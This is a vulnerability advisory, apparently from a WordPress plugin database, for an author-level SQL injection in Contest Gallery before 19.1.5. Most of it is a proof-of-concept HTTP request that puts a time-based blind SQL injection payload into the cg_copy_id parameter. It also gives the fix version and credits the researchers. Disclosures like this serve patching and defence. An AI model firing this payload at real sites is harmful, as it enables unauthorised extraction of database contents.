WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5 - Author+ SQL Injection

Description

The plugins do not escape the cg_copy_id POST parameter before concatenating it to an SQL query in cg-copy-comments.php and cg-copy-rating.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------57928068830176656773670049687
Content-Length: 1508
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7C6333e4fa1fc3f8961218830b63c9910e36a1507d9530ee857dda65208e7bd3bf; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7Cd34e5c9317c939593831376a9467f195ca7e97151d2f965acdbc84aeb291c5b7; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_type"

cg_copy_type_all
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_id"

1 AND (SELECT 7394 FROM (SELECT(SLEEP(2)))UrUZ)
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_start"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="option_id_next_gallery"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="id_to_copy"

1
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="edit_gallery_hidden_post"


-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="copy_v7"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="page"

contest-gallery/index.php
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------57928068830176656773670049687--

Affects Plugins

Fixed in 19.1.5
Fixed in 19.1.5

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Verified
Yes

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other